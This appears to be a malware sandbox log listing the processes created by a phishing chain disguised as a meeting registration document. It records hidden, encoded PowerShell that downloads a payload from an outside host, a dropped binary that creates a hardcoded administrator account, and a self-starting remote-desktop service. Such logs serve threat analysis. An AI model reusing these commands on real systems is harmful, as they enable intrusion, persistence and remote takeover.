Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES2347.tmp" "c:\Users\user\AppData\Local\Temp\oho2nqxk\CSC33DBF5592E3045FEA3FE203350D9DA4A.TMP"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE "C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\user\AppData\Local\Temp\Meeting-Registration-Form.docx.docx" /o ""
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c start /min "" powershell.exe -WindowStyle hidden -NoLogo -NoProfile -ExecutionPolicy bypass -EncodedCommand JAB1AHIAaQAgAD0AIAAiAGgAdAB0AHAAcwA6AC8ALwBjAG8AYwBvAG0AZQB0AGgAbwBkAGUALgBkAGUALwBmAGkAbABlADIALwA4AGEAOAA0AGMAMwA2ADAAOQAzADIAMwBkAGUANgBjAGQAOQBjADIANQBhADEAOAA1ADEAZAAwAGQAYwBkADgAYQAyAGYAMwBiADAAOQA3ADcANgBiAGYAOABlADcAZAA0AGQANgA0ADAAMgBhADYANwAyADAAYwAxAGEAZABkADgAOQBhADIAMwBkADUAZQBkADEAMgBlADAANQBjAGYAMgBmADUAMwBkADcAYgAwADEANQBlADcANgBiAGQANQBiADgAMgAyADMAOQA5ADgANwBjADAANAA5AGQAZQBmAGIAOQBiAGUANwA3ADcANQBmADAAYgA1ADAAZQAxADMAMABkADgAZABiAGUAZABlADQANQA4ADgAYQAwADYAZQAwAGIAYgAwADUANgA4AGIAYwA5AGQAYwA1AGEAOQA1ADkAMAA1ADgAZAAxAGIAOQA4ADcAMwAyAGIAYgA4AGQAYQA0AGMAMAA3AGQAYgBiADUANgA3AGYAOQAzAGYAMwA3ADAANgBkAGQANgAyAGYAZAAyADEAZgA1AGUAYQBlADEANwAyAGQANQAwADIANgBjAGQAZAA1ADIANwA5AGYAIgA7AA0ACgAkAGMAbwB1AG4AdAAgAD0AIAAxADAAMAA7AA0ACgANAAoADQAKAA0ACgBmAHUAbgBjAHQAaQBvAG4AIABTAGUAbgBkACAAewANAAoAIAAgACAAIABwAGEAcgBhAG0AKAAgAFsAUABTAE8AYgBqAGUAYwB0AF0AIAAkAGwAbwBnAE0AcwBnACAAKQANAAoADQAKACAAIAAgACAAIwAgAEMAbwBuAHYAZQByAHQAIABiAG8AZAB5ACAAdABvACAAcwB0AHIAaQBuAGcADQAKACAAIAAgACAAJABzAHQAcgBpAG4AZwBCAG8AZAB5ACAAPQAgAFsAcwB0AHIAaQBuAGcAXQAoACQAbABvAGcATQBzAGcAIAB8ACAAQwBvAG4AdgBlAHIAdABUAG8ALQBKAHMAbwBuACkAOwANAAoAIAAgACAAIAAkAGwAbwBnAE0AZQBzAHMAYQBnAGUAcwAgAD0AIABAACgAKQA7AA0ACgAgACAAIAAgACQAbABvAGcATQBlAHMAcwBhAGcAZQBzACAAKwA9ACAAJABzAHQAcgBpAG4AZwBCAG8AZAB5ADsADQAKACAAIAAgACAAJABsAG8AZwBNAGUAcwBzAGEAZwBlAHMAIAArAD0AIAAiAC0ALQAtAC0ALQAtAC0ALQAtAC0AIgA7AA0ACgANAAoAIAAgACAAIAAkAGgAZQBhAGQAZQByAHMAIAA9ACAAQAB7AH0AOwANAAoAIAAgACAAIAAkAGsAZQB5ACAAPQAgACIAQwBvAG4AdABlAG4AdAAtAFQAeQBwAGUAIgA7AA0ACgAgACAAIAAgACQAdgBhAGwAdQBlACAAPQAgACIAYQBwAHAAbABpAGMAYQB0AGkAbwBuAC8AagBzAG8AbgAiADsADQAKAA0ACgAgACAAIAAgACQAaABlAGEAZABlAHIAcwBbACQAawBlAHkAXQAgAD0AIAAkAHYAYQBsAHUAZQA7AA0ACgAgACAAIAAgACQAdQByAGkAIAA9ACAAIgBMAE8ARwBVAFIATAAiADsADQAKACAAIAAgACAAdAByAHkADQAKACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAkAGIAbwBkAHkAIAA9ACAAJABsAG8AZwBNAGUAcwBzAGEAZwBlAHMAIAB8ACAAQwBvAG4AdgBlAHIAdABUAG8ALQBKAHMAbwBuADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAEkAbgB2AG8AawBlAC0AVwBlAGIAUgBlAHEAdQBlAHMAdAAgAC0AVQByAGkAIAAkAHUAcgBpACAALQBNAGUAdABoAG8AZAAgAFAAbwBzAHQAIAAtAEgAZQBhAGQAZQByAHMAIAAkAGgAZQBhAGQAZQByAHMAIAAtAEIAbwBkAHkAIAAkAGIAbwBkAHkADQAKACAAIAAgACAAIAAgACAAIAB9AA0ACgAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAA0ACgAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAANAAoAfQANAAoADQAKAHcAaABpAGwAZQAoACQAYwBvAHUAbgB0ACAALQBnAHQAIAAwACkADQAKAHsADQAKAAkADQAKAAkAdAByAHkAewANAAoAIAAgACAAIAAgACAAIAAgAFMAZQBuAGQAIAAiAGIAZQBnAGkAbgAgAGQAbwB3AG4AbABvAGEAZAAgACQAdQByAGkAIgA7AA0ACgAJAAkAJABjAG8AbgB0AGUAbgB0ACAAPQAgAEkAbgB2AG8AawBlAC0AVwBlAGIAUgBlAHEAdQBlAHMAdAAgAC0AVQByAGkAIAAkAHUAcgBpACAALQBVAHMAZQBCAGEAcwBpAGMAUABhAHIAcwBpAG4AZwA7AA0ACgAgACAAIAAgACAAIAAgACAAJABiAHkAdABlAEEAcgByAGEAeQAgAD0AIAAkAGMAbwBuAHQAZQBuAHQALgBjAG8AbgB0AGUAbgB0ADsADQAKACAAIAAgACAAIAAgACAAIABmAG8AcgAgACgAJABpAC
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle hidden -NoLogo -NoProfile -ExecutionPolicy bypass -EncodedCommand JAB1AHIAaQAgAD0AIAAiAGgAdAB0AHAAcwA6AC8ALwBjAG8AYwBvAG0AZQB0AGgAbwBkAGUALgBkAGUALwBmAGkAbABlADIALwA4AGEAOAA0AGMAMwA2ADAAOQAzADIAMwBkAGUANgBjAGQAOQBjADIANQBhADEAOAA1ADEAZAAwAGQAYwBkADgAYQAyAGYAMwBiADAAOQA3ADcANgBiAGYAOABlADcAZAA0AGQANgA0ADAAMgBhADYANwAyADAAYwAxAGEAZABkADgAOQBhADIAMwBkADUAZQBkADEAMgBlADAANQBjAGYAMgBmADUAMwBkADcAYgAwADEANQBlADcANgBiAGQANQBiADgAMgAyADMAOQA5ADgANwBjADAANAA5AGQAZQBmAGIAOQBiAGUANwA3ADcANQBmADAAYgA1ADAAZQAxADMAMABkADgAZABiAGUAZABlADQANQA4ADgAYQAwADYAZQAwAGIAYgAwADUANgA4AGIAYwA5AGQAYwA1AGEAOQA1ADkAMAA1ADgAZAAxAGIAOQA4ADcAMwAyAGIAYgA4AGQAYQA0AGMAMAA3AGQAYgBiADUANgA3AGYAOQAzAGYAMwA3ADAANgBkAGQANgAyAGYAZAAyADEAZgA1AGUAYQBlADEANwAyAGQANQAwADIANgBjAGQAZAA1ADIANwA5AGYAIgA7AA0ACgAkAGMAbwB1AG4AdAAgAD0AIAAxADAAMAA7AA0ACgANAAoADQAKAA0ACgBmAHUAbgBjAHQAaQBvAG4AIABTAGUAbgBkACAAewANAAoAIAAgACAAIABwAGEAcgBhAG0AKAAgAFsAUABTAE8AYgBqAGUAYwB0AF0AIAAkAGwAbwBnAE0AcwBnACAAKQANAAoADQAKACAAIAAgACAAIwAgAEMAbwBuAHYAZQByAHQAIABiAG8AZAB5ACAAdABvACAAcwB0AHIAaQBuAGcADQAKACAAIAAgACAAJABzAHQAcgBpAG4AZwBCAG8AZAB5ACAAPQAgAFsAcwB0AHIAaQBuAGcAXQAoACQAbABvAGcATQBzAGcAIAB8ACAAQwBvAG4AdgBlAHIAdABUAG8ALQBKAHMAbwBuACkAOwANAAoAIAAgACAAIAAkAGwAbwBnAE0AZQBzAHMAYQBnAGUAcwAgAD0AIABAACgAKQA7AA0ACgAgACAAIAAgACQAbABvAGcATQBlAHMAcwBhAGcAZQBzACAAKwA9ACAAJABzAHQAcgBpAG4AZwBCAG8AZAB5ADsADQAKACAAIAAgACAAJABsAG8AZwBNAGUAcwBzAGEAZwBlAHMAIAArAD0AIAAiAC0ALQAtAC0ALQAtAC0ALQAtAC0AIgA7AA0ACgANAAoAIAAgACAAIAAkAGgAZQBhAGQAZQByAHMAIAA9ACAAQAB7AH0AOwANAAoAIAAgACAAIAAkAGsAZQB5ACAAPQAgACIAQwBvAG4AdABlAG4AdAAtAFQAeQBwAGUAIgA7AA0ACgAgACAAIAAgACQAdgBhAGwAdQBlACAAPQAgACIAYQBwAHAAbABpAGMAYQB0AGkAbwBuAC8AagBzAG8AbgAiADsADQAKAA0ACgAgACAAIAAgACQAaABlAGEAZABlAHIAcwBbACQAawBlAHkAXQAgAD0AIAAkAHYAYQBsAHUAZQA7AA0ACgAgACAAIAAgACQAdQByAGkAIAA9ACAAIgBMAE8ARwBVAFIATAAiADsADQAKACAAIAAgACAAdAByAHkADQAKACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAkAGIAbwBkAHkAIAA9ACAAJABsAG8AZwBNAGUAcwBzAGEAZwBlAHMAIAB8ACAAQwBvAG4AdgBlAHIAdABUAG8ALQBKAHMAbwBuADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAEkAbgB2AG8AawBlAC0AVwBlAGIAUgBlAHEAdQBlAHMAdAAgAC0AVQByAGkAIAAkAHUAcgBpACAALQBNAGUAdABoAG8AZAAgAFAAbwBzAHQAIAAtAEgAZQBhAGQAZQByAHMAIAAkAGgAZQBhAGQAZQByAHMAIAAtAEIAbwBkAHkAIAAkAGIAbwBkAHkADQAKACAAIAAgACAAIAAgACAAIAB9AA0ACgAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAA0ACgAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAANAAoAfQANAAoADQAKAHcAaABpAGwAZQAoACQAYwBvAHUAbgB0ACAALQBnAHQAIAAwACkADQAKAHsADQAKAAkADQAKAAkAdAByAHkAewANAAoAIAAgACAAIAAgACAAIAAgAFMAZQBuAGQAIAAiAGIAZQBnAGkAbgAgAGQAbwB3AG4AbABvAGEAZAAgACQAdQByAGkAIgA7AA0ACgAJAAkAJABjAG8AbgB0AGUAbgB0ACAAPQAgAEkAbgB2AG8AawBlAC0AVwBlAGIAUgBlAHEAdQBlAHMAdAAgAC0AVQByAGkAIAAkAHUAcgBpACAALQBVAHMAZQBCAGEAcwBpAGMAUABhAHIAcwBpAG4AZwA7AA0ACgAgACAAIAAgACAAIAAgACAAJABiAHkAdABlAEEAcgByAGEAeQAgAD0AIAAkAGMAbwBuAHQAZQBuAHQALgBjAG8AbgB0AGUAbgB0ADsADQAKACAAIAAgACAAIAAgACAAIABmAG8AcgAgACgAJABpACAAPQAgADAAOwAgAC
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Windows\System32\sppsvc.exe C:\Windows\system32\sppsvc.exe
Source: unknown	Process created: C:\Windows\Temp\svczHost.exe C:\Windows\Temp\svczHost.exe cakoi10 cocomethode.de
Source: C:\Windows\Temp\svczHost.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\Temp\svczHost.exe	Process created: C:\Windows\System32\cmd.exe "cmd.exe" /c del /q "C:\Windows \System32\*" & rmdir "C:\Windows \System32" & rmdir "C:\Windows \"
Source: C:\Windows\Temp\svczHost.exe	Process created: C:\Windows\System32\cmd.exe "cmd.exe" /c sc query myRdpService
Source: C:\Windows\Temp\svczHost.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -NoLogo -NoProfile -WindowStyle Hidden -ExecutionPolicy bypass -EncodedCommand ZgB1AG4AYwB0AGkAbwBuACAARwBlAHQALQBJAGQAZQBuAHQAaQB0AHkAewAKACAAIAAgACAAJABoAGEAcgBkAEQAcgBpAHYAZQBzACAAPQAgAEcAZQB0AC0AVwBtAGkATwBiAGoAZQBjAHQAIAAtAEMAbABhAHMAcwAgAFcAaQBuADMAMgBfAEQAaQBzAGsARAByAGkAdgBlACAAfAAgAFcAaABlAHIAZQAtAE8AYgBqAGUAYwB0ACAAewAgACQAXwAuAE0AZQBkAGkAYQBUAHkAcABlACAALQBlAHEAIAAiAEYAaQB4AGUAZAAgAGgAYQByAGQAIABkAGkAcwBrACAAbQBlAGQAaQBhACIAIAAtAG8AcgAgACQAXwAuAE0AZQBkAGkAYQBUAHkAcABlACAALQBlAHEAIAAiAEYAaQB4AGUAZAAgAGgAYQByAGQAIABkAGkAcwBrACAAbQBlAGQAaQBhACAALQAgAFMAUwBEACIAIAB9AAoAJABkAHIAaQB2AGUASQBuAGYAbwBBAHIAcgBhAHkAIAA9ACAAQAAoACkACgBmAG8AcgBlAGEAYwBoACAAKAAkAGgAYQByAGQARAByAGkAdgBlACAAaQBuACAAJABoAGEAcgBkAEQAcgBpAHYAZQBzACkAIAB7AAoAIAAgACAAIAAkAHMAZQByAGkAYQBsAE4AdQBtAGIAZQByACAAPQAgACQAaABhAHIAZABEAHIAaQB2AGUALgBTAGUAcgBpAGEAbABOAHUAbQBiAGUAcgAKACAAIAAgACAAJABtAG8AZABlAGwAIAA9ACAAJABoAGEAcgBkAEQAcgBpAHYAZQAuAE0AbwBkAGUAbAAKACAAIAAgACAAJABkAHIAaQB2AGUASQBuAGYAbwAgAD0AIAAiAFMAZQByAGkAYQBsACAATgB1AG0AYgBlAHIAOgAgACQAcwBlAHIAaQBhAGwATgB1AG0AYgBlAHIALAAgAE0AbwBkAGUAbAA6ACAAJABtAG8AZABlAGwAIgAKACAAIAAgACAAJABkAHIAaQB2AGUASQBuAGYAbwBBAHIAcgBhAHkAIAArAD0AIAAkAGQAcgBpAHYAZQBJAG4AZgBvAAoAfQAKACQAYwBvAG0AYgBpAG4AZQBkAEkAbgBmAG8AIAA9ACAAJABkAHIAaQB2AGUASQBuAGYAbwBBAHIAcgBhAHkAIAAtAGoAbwBpAG4AIAAiAGAAcgBgAG4AIgAKACQAYwBwAHUASQBuAGYAbwAgAD0AIABHAGUAdAAtAFcAbQBpAE8AYgBqAGUAYwB0ACAALQBDAGwAYQBzAHMAIABXAGkAbgAzADIAXwBQAHIAbwBjAGUAcwBzAG8AcgAKACQAYwBwAHUARABlAHQAYQBpAGwAcwAgAD0AIAAiAFAAcgBvAGMAZQBzAHMAbwByAEkAZAA6ACAAJAAoACQAYwBwAHUASQBuAGYAbwAuAFAAcgBvAGMAZQBzAHMAbwByAEkAZAApACwAIABOAGEAbQBlADoAIAAkACgAJABjAHAAdQBJAG4AZgBvAC4ATgBhAG0AZQApACwAIABNAGEAeABDAGwAbwBjAGsAUwBwAGUAZQBkADoAIAAkACgAJABjAHAAdQBJAG4AZgBvAC4ATQBhAHgAQwBsAG8AYwBrAFMAcABlAGUAZAApACwAIABVAG4AaQBxAHUAZQBJAGQAOgAgACQAKAAkAGMAcAB1AEkAbgBmAG8ALgBVAG4AaQBxAHUAZQBJAGQAKQAiAAoAJABhAGwAbABJAG4AZgBvACAAPQAgACIAJABjAG8AbQBiAGkAbgBlAGQASQBuAGYAbwBgAHIAYABuACQAYwBwAHUARABlAHQAYQBpAGwAcwAiAAoAJABtAGQANQAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBTAGUAYwB1AHIAaQB0AHkALgBDAHIAeQBwAHQAbwBnAHIAYQBwAGgAeQAuAE0ARAA1AEMAcgB5AHAAdABvAFMAZQByAHYAaQBjAGUAUAByAG8AdgBpAGQAZQByAAoAJABiAHkAdABlAHMAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AEIAeQB0AGUAcwAoACQAYQBsAGwASQBuAGYAbwApAAoAJABoAGEAcwBoAEIAeQB0AGUAcwAgAD0AIAAkAG0AZAA1AC4AQwBvAG0AcAB1AHQAZQBIAGEAcwBoACgAJABiAHkAdABlAHMAKQAKACQAaABhAHMAaAAgAD0AIABbAEIAaQB0AEMAbwBuAHYAZQByAHQAZQByAF0AOgA6AFQAbwBTAHQAcgBpAG4AZwAoACQAaABhAHMAaABCAHkAdABlAHMAKQAgAC0AcgBlAHAAbABhAGMAZQAgACcALQAnAAoAIAAgACAAIAByAGUAdAB1AHIAbgAgACQAaABhAHMAaAA7AAoAfQAKAGMAZAAgACIAQwA6AFwAVwBpAG4AZABvAHcAcwBcAFQAZQBtAHAAIgA7AAoAJAB0AGUAcwB0ACAAPQAgAEcAZQB0AC0ASQBkAGUAbgB0AGkAdAB5ADsACgAkAHQAZQBzAHQAIAB8ACAATwB1AHQALQBGAGkAbABlACAALQBGAGkAbABlAFAAYQB0AGgAIAAiAGQAZQB2AGkAYwBlAEkAZAAuAHQAeAB0ACIAIAAtAEUAbgBjAG8AZABpAG4AZwAgAFUAVABGADgA
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc query myRdpService
Source: C:\Windows\Temp\svczHost.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -NoLogo -NoProfile -WindowStyle Hidden -ExecutionPolicy bypass -EncodedCommand JABVAHMAZQByAG4AYQBtAGUAIAA9ACAAIgBVAHMAZQByADEAIgA7ACQAcAB3AGQAIAA9ACAAIgAxADIAMwA0ADUANgA3ADgAOQAhAEEAMQBhACIAOwAgACQAVQBzAGUAcgBQAGEAcgBhAG0AcwAgAD0AIABAAHsAJwBOAGEAbQBlACcAIAA9ACAAJABVAHMAZQByAG4AYQBtAGUAOwAgACcAUABhAHMAcwB3AG8AcgBkACcAIAA9ACAAKABDAG8AbgB2AGUAcgB0AFQAbwAtAFMAZQBjAHUAcgBlAFMAdAByAGkAbgBnACAALQBTAHQAcgBpAG4AZwAgACQAcAB3AGQAIAAtAEEAcwBQAGwAYQBpAG4AVABlAHgAdAAgAC0ARgBvAHIAYwBlACkAOwAgACcAUABhAHMAcwB3AG8AcgBkAE4AZQB2AGUAcgBFAHgAcABpAHIAZQBzACcAIAA9ACAAJAB0AHIAdQBlAH0AOwBOAGUAdwAtAEwAbwBjAGEAbABVAHMAZQByACAAQABVAHMAZQByAFAAYQByAGEAbQBzADsAJABHAHIAbwB1AHAAUABhAHIAYQBtAHMAIAA9ACAAQAB7ACcARwByAG8AdQBwACcAIAA9ACAAJwBBAGQAbQBpAG4AaQBzAHQAcgBhAHQAbwByAHMAJwA7ACAAJwBNAGUAbQBiAGUAcgAnACAAPQAgACQAVQBzAGUAcgBuAGEAbQBlAH0AOwBBAGQAZAAtAEwAbwBjAGEAbABHAHIAbwB1AHAATQBlAG0AYgBlAHIAIABAAEcAcgBvAHUAcABQAGEAcgBhAG0AcwA7AA0ACgA=
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\Temp\svczHost.exe	Process created: C:\Windows\System32\cmd.exe "cmd.exe" /c sc query myRdpService
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc query myRdpService
Source: C:\Windows\Temp\svczHost.exe	Process created: C:\Windows\System32\cmd.exe "cmd.exe" /c sc stop "myRdpService"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc stop "myRdpService"
Source: C:\Windows\Temp\svczHost.exe	Process created: C:\Windows\System32\cmd.exe "cmd.exe" /c sc query myRdpService
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc query myRdpService
Source: C:\Windows\Temp\svczHost.exe	Process created: C:\Windows\System32\cmd.exe "cmd.exe" /c sc delete "myRdpService" & SC CREATE "myRdpService" binpath= "C:\Windows\Temp\myRdpService.exe cakoi10" start= auto & net start "myRdpService"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc delete "myRdpService"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe SC CREATE "myRdpService" binpath= "C:\Windows\Temp\myRdpService.exe cakoi10" start= auto
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\net.exe net start "myRdpService"
Source: C:\Windows\System32\net.exe	Process created: C:\Windows\System32\net1.exe C:\Windows\system32\net1 start "myRdpService"
Source: unknown	Process created: C:\Windows\Temp\myRdpService.exe C:\Windows\Temp\myRdpService.exe cakoi10
Source: C:\Windows\Temp\myRdpService.exe	Process created: C:\Windows\regedit.exe "regedit.exe" /e "C:\Windows\Temp\regBackup.reg" "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermService"
Source: C:\Windows\Temp\myRdpService.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -Command "systeminfo \| Select-String \"OS Name\",\"OS Version\";"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\systeminfo.exe "C:\Windows\system32\systeminfo.exe"
Source: C:\Windows\System32\systeminfo.exe	Process created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Source: C:\Windows\Temp\myRdpService.exe	Process created: C:\Windows\System32\cmd.exe /c powershell.exe -w hidden -nologo -nop -ep bypass -EncodedCommand QQBkAGQALQBUAHkAcABlACAALQBBAHMAcwBlAG0AYgBsAHkATgBhAG0AZQAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwA7ACAAWwBTAHkAcwB0AGUAbQAuAFcAaQBuAGQAbwB3AHMALgBGAG8AcgBtAHMALgBTAGMAcgBlAGUAbgBdADoAOgBBAGwAbABTAGMAcgBlAGUAbgBzACAAfAAgAEYAbwByAEUAYQBjAGgALQBPAGIAagBlAGMAdAAgAHsAIAAiACQAKAAkAF8ALgBCAG8AdQBuAGQAcwAuAFcAaQBkAHQAaAApAHgAJAAoACQAXwAuAEIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQAiACAAfQAgAHwAIABPAHUAdAAtAEYAaQBsAGUAIAAtAEYAaQBsAGUAUABhAHQAaAAgACIAQwA6AFwAVwBpAG4AZABvAHcAcwBcAFQAZQBtAHAAXABkAHAAIgA=
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -w hidden -nologo -nop -ep bypass -EncodedCommand QQBkAGQALQBUAHkAcABlACAALQBBAHMAcwBlAG0AYgBsAHkATgBhAG0AZQAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwA7ACAAWwBTAHkAcwB0AGUAbQAuAFcAaQBuAGQAbwB3AHMALgBGAG8AcgBtAHMALgBTAGMAcgBlAGUAbgBdADoAOgBBAGwAbABTAGMAcgBlAGUAbgBzACAAfAAgAEYAbwByAEUAYQBjAGgALQBPAGIAagBlAGMAdAAgAHsAIAAiACQAKAAkAF8ALgBCAG8AdQBuAGQAcwAuAFcAaQBkAHQAaAApAHgAJAAoACQAXwAuAEIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQAiACAAfQAgAHwAIABPAHUAdAAtAEYAaQBsAGUAIAAtAEYAaQBsAGUAUABhAHQAaAAgACIAQwA6AFwAVwBpAG4AZABvAHcAcwBcAFQAZQBtAHAAXABkAHAAIgA=
Source: C:\Windows\Temp\svczHost.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -NoLogo -NoProfile -WindowStyle Hidden -ExecutionPolicy bypass -EncodedCommand ZwBlAHQALQBzAGUAcgB2AGkAYwBlACAAIgBtAHkAUgBkAHAAUwBlAHIAdgBpAGMAZQAiAA==
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powERSheLl.EXE -WInDOwStYle HiDdEN -encOdeDcOmmAnd "UwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgAHAAbwB3AGUAcgBzAGgAZQBsAGwAIAAtAFcAaQBuAGQAbwB3AFMAdAB5AGwAZQAgAGgAaQBkAGQAZQBuACAALQBBAHIAZwB1AG0AZQBuAHQATABpAHMAdAAgACIALQBXAGkAbgBkAG8AdwBTAHQAeQBsAGUAIABIAGkAZABkAGUAbgAiACwAIAAiAC0ATgBvAEwAbwBnAG8AIgAsACAAIgAtAE4AbwBQAHIAbwBmAGkAbABlACIALAAgACIALQBFAHgAZQBjAHUAdABpAG8AbgBQAG8AbABpAGMAeQAgAEIAeQBwAGEAcwBzACIALAAgACIALQBFAG4AYwBvAGQAZQBkAEMAbwBtAG0AYQBuAGQAIABTAFEAQgBGAEEARgBnAEEASQBBAEEAbwBBAEYAcwBBAFYAQQBCAEYAQQBGAGcAQQBWAEEAQQB1AEEARQBVAEEAVABnAEIARABBAEUAOABBAFoAQQBCAHAAQQBHADQAQQBSAHcAQgBkAEEARABvAEEATwBnAEIAVgBBAEYAUQBBAFIAZwBBADQAQQBDADQAQQBSAHcAQgBGAEEASABRAEEAVQB3AEIAVQBBAEgASQBBAFMAUQBCAE8AQQBFAGMAQQBLAEEAQQBvAEEARQBrAEEAVgB3AEIAeQBBAEMAQQBBAEsAQQBCAGIAQQBGAE0AQQBlAFEAQgB6AEEASABRAEEAWgBRAEIAdABBAEMANABBAFYAQQBCAGwAQQBIAGcAQQBkAEEAQQB1AEEARQBVAEEAYgBnAEIAagBBAEcAOABBAFoAQQBCAHAAQQBHADQAQQBaAHcAQgBkAEEARABvAEEATwBnAEIAVgBBAEYAUQBBAFIAZwBBADQAQQBDADQAQQBSAHcAQgBsAEEASABRAEEAVQB3AEIAMABBAEgASQBBAGEAUQBCAHUAQQBHAGMAQQBLAEEAQgBiAEEARQBNAEEAYgB3AEIAdQBBAEgAWQBBAFoAUQBCAHkAQQBIAFEAQQBYAFEAQQA2AEEARABvAEEAUgBnAEIAeQBBAEcAOABBAGIAUQBCAEMAQQBHAEUAQQBjAHcAQgBsAEEARABZAEEATgBBAEIAVABBAEgAUQBBAGMAZwBCAHAAQQBHADQAQQBaAHcAQQBvAEEAQwBJAEEAWQBRAEIASQBBAEYASQBBAE0AQQBCAGoAQQBFAGcAQQBUAFEAQQAyAEEARQB3AEEAZQBRAEEANQBBAEcAbwBBAFkAZwBBAHkAQQBFADQAQQBkAGcAQgBpAEEARgBjAEEAVgBnAEEAdwBBAEcARQBBAFIAdwBBADUAQQBHAHMAQQBXAGcAQgBUAEEARABVAEEAYQB3AEIAYQBBAEYATQBBAE8AUQBCAGgAQQBGAG8AQQBRAFEAQQA5AEEARAAwAEEASQBnAEEAcABBAEMAawBBAEsAUQBBAHAAQQBDADQAQQBRAHcAQgBQAEEARQA0AEEAZABBAEIARgBBA